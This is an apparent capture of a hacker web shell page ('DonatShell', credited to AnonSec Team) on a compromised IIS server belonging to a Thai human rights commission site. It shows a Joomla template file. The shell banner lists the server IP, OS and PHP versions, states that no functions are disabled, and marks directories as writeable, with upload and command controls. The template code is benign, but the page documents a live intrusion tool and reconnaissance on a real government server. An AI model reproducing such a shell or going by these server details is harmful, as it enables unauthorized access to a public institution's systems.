DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /AppServ/www/app/webroot/news/templates/telecom/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /AppServ/www/app/webroot/news/templates/telecom/index.php
<?php
/**
 * @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
 * @license		GNU/GPL, see LICENSE.php
 * Joomla! is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * See COPYRIGHT.php for copyright notices and details.
 */

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

include_once (dirname(__FILE__).DS.'/ja_vars.php');

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>">
    <head>
    <jdoc:include type="head" />

    <link rel="stylesheet" href="<?php echo $tmpTools->baseurl(); ?>templates/system/css/system.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $tmpTools->baseurl(); ?>templates/system/css/general.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl(); ?>/css/styles.css" type="text/css" media="screen, projector">
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl(); ?>/css/indexcolourscheme.css" type="text/css" media="screen, projector" >
    <!--START FUNCTION SLIDE BIG BACKGROUND-->
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl(); ?>/css/supersized.css" type="text/css" media="screen" />
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl(); ?>/theme/supersized.shutter.css" type="text/css" media="screen" />
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/jquery.easing.min.js"></script>
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/supersized.3.2.7.min.js"></script>
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/theme/supersized.shutter.min.js"></script>
    <script type="text/javascript">

jQuery(function($){
		
		$.supersized({
		
			// Functionality
			slide_interval          :   3000,		// Length between transitions
			transition              :   1, 			// 0-None, 1-Fade, 2-Slide Top, 3-Slide Right, 4-Slide Bottom, 5-Slide Left, 6-Carousel Right, 7-Carousel Left
			transition_speed		:	700,		// Speed of transition
													   
			// Components							
			//slide_links				:	'blank',	// Individual links for each slide (Options: false, 'num', 'name', 'blank')
			//slides 					:  	[			// Slideshow Images
			//									{image : '<?php echo $tmpTools->templateurl(); ?>/images/mainslider/1.jpg', title : 'Image 1'},
			//									{image : '<?php echo $tmpTools->templateurl(); ?>/images/mainslider/2.jpg', title : 'Image 2'},
			//									{image : '<?php echo $tmpTools->templateurl(); ?>/images/mainslider/3.jpg', title : 'Image 3'},
			//									{image : '<?php echo $tmpTools->templateurl(); ?>/images/mainslider/4.jpg', title : 'Image 4'},
			//									{image : '<?php echo $tmpTools->templateurl(); ?>/images/mainslider/5.jpg', title : 'Image 5'}
			//							]
			
		});


});
	
</script>
    <!--END FUNCTION SLIDE BIG BACKGROUND-->

    <!-- for menu droupdown -->
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/jquery-1.9.1.min.js"></script>
    <!-- <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/jquery.min.js"></script> -->
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/s3Slider.js"></script>
    <script type="text/javascript">
   
	
	var timeout         = 500;
	var closetimer		= 0;
	var ddmenuitem      = 0;

	function jsddm_open()
	{	jsddm_canceltimer();
		jsddm_close();
		ddmenuitem = $(this).find('ul').eq(0).css('visibility', 'visible');}

	function jsddm_close()
	{	if(ddmenuitem) ddmenuitem.css('visibility', 'hidden');}

	function jsddm_timer()
	{	closetimer = window.setTimeout(jsddm_close, timeout);}

	function jsddm_canceltimer()
	{	if(closetimer)
		{	window.clearTimeout(closetimer);
			closetimer = null;}}

jQuery.noConflict();
(function( $ ) {
  $(function() {

    $('.menu-jsddm > li').bind('mouseover', jsddm_open);
		$('.menu-jsddm > li').bind('mouseout',  jsddm_timer);

});
})(jQuery);

	document.onclick = jsddm_close;

</script>

    <!-- START DATE CALENDAR -->
    <link type="text/css" href="<?php echo $tmpTools->templateurl(); ?>/css/ui-lightness/jquery-ui-1.8.17.custom.css" rel="stylesheet" />
    <!-- <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/jquery-1.7.1.min.js"></script>-->
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/jquery-ui-1.8.17.custom.min.js"></script>
    <script type="text/javascript">
      jQuery.noConflict();
      (function( $ ) {
        $(function() {

			// Datepicker
			$('#datepicker').datepicker({
				inline: true
			});

      });
      })(jQuery);
	</script>
    <!-- END DATE CALENDAR -->

    <!-- Start Jqurry slider NEWS -->
    <script src="<?php echo $tmpTools->templateurl(); ?>/js/jquery.flow.1.1.min.js" type="text/javascript"></script>
    <script type="text/javascript">
      jQuery.noConflict();
      (function( $ ) {
        $(function() {

        $("div#controller").jFlow({
            slides: "#slides",
            width: "681px",
            height: "275px"
        });

      });
      })(jQuery);
    </script>
    <!-- End Jqurry slider NEWS -->

    <!-- Start Jqurry slider PIC Activity -->
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/Slidername.js"></script>
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/utilities.js"></script>
    <script type="text/javascript" src="<?php echo $tmpTools->templateurl(); ?>/js/Slider.js"></script>
    <!-- End Jqurry slider PIC Activity -->
    </head>

    <body id="bd" class="fs<?php echo $tmpTools->getParam(JA_TOOL_FONT);?> <?php echo $tmpTools->browser();?>" >
<a name="Top" id="Top"></a>
<ul class="accessibility">
      <li><a href="#ja-content" title="<?php echo JText::_("Skip to content");?>"><?php echo JText::_("Skip to content");?></a></li>
      <li><a href="#ja-mainnav" title="<?php echo JText::_("Skip to main navigation");?>"><?php echo JText::_("Skip to main navigation");?></a></li>
      <li><a href="#ja-col1" title="<?php echo JText::_("Skip to 1st column");?>"><?php echo JText::_("Skip to 1st column");?></a></li>
      <li><a href="#ja-col2" title="<?php echo JText::_("Skip to 2nd column");?>"><?php echo JText::_("Skip to 2nd column");?></a></li>
    </ul>
<div id="wrapper"> 
      
      <!-- BEGIN: HEADER -->
      <div id="header">
    <div class="headerleft"><a id="logo" href="<?php echo $this->baseurl ?>" title="<?php echo $siteName; ?>"><img src="<?php echo $tmpTools->templateurl(); ?>/images/header.png" alt="<?php echo $siteName; ?>" title="<?php echo $siteName; ?>"><span><?php echo $siteName; ?></span></a></div>
    <div class="headerright"><!-- Wjen change Lang TH ple add class="select" at tag span -->
          <div class="line1"><!--<span class="mutilang"><span class="select"><a href="#" title="EN">EN</a> <a href="#" title="TH">TH</a></span></span>--></div>
          <div class="line2">
        <jdoc:include type="modules" name="topnav" />
      </div>
        </div>
    <br class="clear-all">
    <div class="headerbutton">
          <div class="menu">
            <jdoc:include type="modules" name="hornav" />
          </div>
      
          <!-- <div class="searchbox">
        <div id="search">
        <form action="index.php" id="searchform" method="post">
            <input name="searchword" id="mod_search_searchword" maxlength="20" alt="Search" class="inputbox" type="text" size="20" value=""  />
            <input type="submit" id="searchsubmit" name="task" value="search" />
            <input type="hidden" name="option" value="com_search" />
            <input type="hidden" name="Itemid" value=1 />
          </form>
            </div> 
      </div> -->
        </div>
  </div>
      <!-- END: HEADER -->
      <div class="transparent"></div>
      
      <!-- start content-default_nocoltwothree -->
      <div id="content-default_nocoltwothree" >
<!-- Slider Main  -->
<ul id="slide-list">
    </ul>
<!-- Slider Main --> 

<!-- start column 1 -->
<div id="col-one"> 
       
      
      
  <?php 
  $option = JRequest::getVar('option');
  $view = JRequest::getVar('view');
  if($option=="com_content" && $view=="frontpage"){
  ?>
  <!-- START Slider NEWS -->
  <div class="newsSlide">
    <h3>What's new</h3>
    <jdoc:include type="modules" name="latestnews" />
    <div id="slides">
      <div class="s">
        <div class="img"><img src="http://www.energy.go.th/sites/all/files/imagepicker/8/flood_ptt.jpg" alt="" width="288px" height="166px;"/></div>
        <div class="info">
          <p class="title">กระทรวงพลังงานรับมอบถุงยังชีพจากพีทีทีซีจี เพื่อนำไปช่วยเหลือประชาชนที่ประสบปัญหาอุทกภัย (18 ต.ค. 56)</p>
          <p class="date"> </p>
          <p>กระทรวงพลังงานรับมอบถุงยังชีพจากพีทีทีซีจี เพื่อนำไปช่วยเหลือประชาชนที่ประสบปัญหาอุทกภัย (18 ต.ค. 56)</p>
        </div>
      </div>
      <div class="s">
        <div class="img"><img src="http://www.riskcomddc.com/images/DPC9/1375918_526433110778926_2144844416_n_500_375.jpg" alt="" width="288px" height="166px;"/></div>
        <div class="info">
          <p class="title">สคร.9 เตือนภัยหนาวมาแล้ว</p>
          <p class="date"> </p>
          <p>สคร.9 เตือนภัยหนาวมาแล้ว คอทองแดงดื่มเหล้าแก้หนาว ผิงไฟในเต็นท์ อาจพลาดท่าเสียชีวิตได้ง่าย</p>
        </div>
      </div>
    </div>
    <div id="prevPrevious"> <img src="<?php echo $tmpTools->templateurl(); ?>/images/ArrowPre.png" alt="Previous Tab" class="jFlowPrev" /> </div>
    <div id="prevNext"> <img src="<?php echo $tmpTools->templateurl(); ?>/images/ArrowNex.png" alt="Next Tab" class="jFlowNext" /> </div>
    <!-- <span class="jFlowControl"></span> number of pic slide please add this class-->
    <div id="controller"> <span class="jFlowControl">1</span> <span class="jFlowControl">2</span></div>
  </div>
  <div id="clear-slide"></div>
  <!-- END Slider NEWS --> 
  <?php } ?>
      
      <?php if ($this->countModules('gallery')) { ?>
    <div class="galleryarea">
      <jdoc:include type="modules" name="gallery" style="xhtml"/>
    </div>
    <?php } ?>
      
    <jdoc:include type="message" />
    <jdoc:include type="component" />
    <!-- User1 --> 
  <div class="leftarea">
      <jdoc:include type="modules" name="user1" style="xhtml" />
    </div>
  <!-- User2 --> 
  <div class="rightarea">
      <jdoc:include type="modules" name="user2" style="xhtml" />
    </div>
    <!-- User3 --> 
  <div class="centerarea">
      <jdoc:include type="modules" name="user3"  style="xhtml" />
    </div>
    
        <!-- User4 --> 
  <div class="leftarea">
      <jdoc:include type="modules" name="user4" style="xhtml" />
    </div>
  <!-- User5 --> 
  <div class="rightarea">
      <jdoc:include type="modules" name="user5" style="xhtml" />
    </div>
     <!-- User6 --> 
  <div class="centerarea">
      <jdoc:include type="modules" name="user6" style="xhtml" />
    </div>
  
    
  </div>
 
	<div id="col-two-three"> 
     <?php if ($this->countModules('right')) { ?>
      <!-- Right --> 
      <div class="rightarea">
          <jdoc:include type="modules" name="right" style="xhtml" />
          </div>
    <?php } ?>
    </div>
    
</div>
<!-- start footer -->
<footer class="art-footer">
  <div class="art-footer-inner">
<div class="art-content-layout">
    <div class="art-content-layout-row">
    <div class="art-layout-cell" style="width: 100%">
     <jdoc:include type="modules" name="footer1" />

        <div style="position:relative;padding-left:10px;padding-right:10px">
		
		<strong>สำนักงานคณะกรรมการสิทธิมนุษยชนแห่งชาติ</strong>
                ศูนย์ราชการเฉลิมพระเกียรติ 80 พรรษา 5 ธันวาคม 2550 อาคารรัฐประศาสนภักดี (อาคารบี)<br>
                120 หมู่ที่ 3 ถนน แจ้งวัฒนะ แขวงทุ่งสองห้อง เขต หลักสี่ กรุงเทพฯ 10210
        <p>
            จำนวนผู้เข้าชม            <!-- Start of StatCounter Code for Default Guide -->
            <script type="text/javascript">
            var sc_project=9601048; 
            var sc_invisible=0; 
            var sc_security="96586c19"; 
            var scJsHost = (("https:" == document.location.protocol) ?
            "https://secure." : "http://www.");
            document.write("<sc"+"ript type='text/javascript' src='" +
            scJsHost+
            "statcounter.com/counter/counter.js'></"+"script>");
            </script>
            <noscript><div class="statcounter"><a title="website
            statistics" href="http://statcounter.com/"
            target="_blank"><img class="statcounter"
            src="http://c.statcounter.com/9601048/0/96586c19/0/"
            alt="website statistics"></a></div></noscript>
            <!-- End of StatCounter Code for Default Guide -->
            ตั้งแต่วันที่ 1 มีนาคม 2557        <br>
			<img src="images/call1377.png" height="60" alt="สายด่วนร้องเรียน 1377" title="สายด่วนร้องเรียน 1377" />
			</p>
		
		</div>
   
</div>
    </div>


<div class="leftfooter">
<jdoc:include type="modules" name="footer2" />
</div>
<div class="rightfooter">
<jdoc:include type="modules" name="footer3" />
</div>

</div>
</footer>
<!-- end footer -->

</div>
<!-- end wrapper -->
<jdoc:include type="modules" name="debug" />
</body>
</html>

Anon7 - 2022
AnonSec Team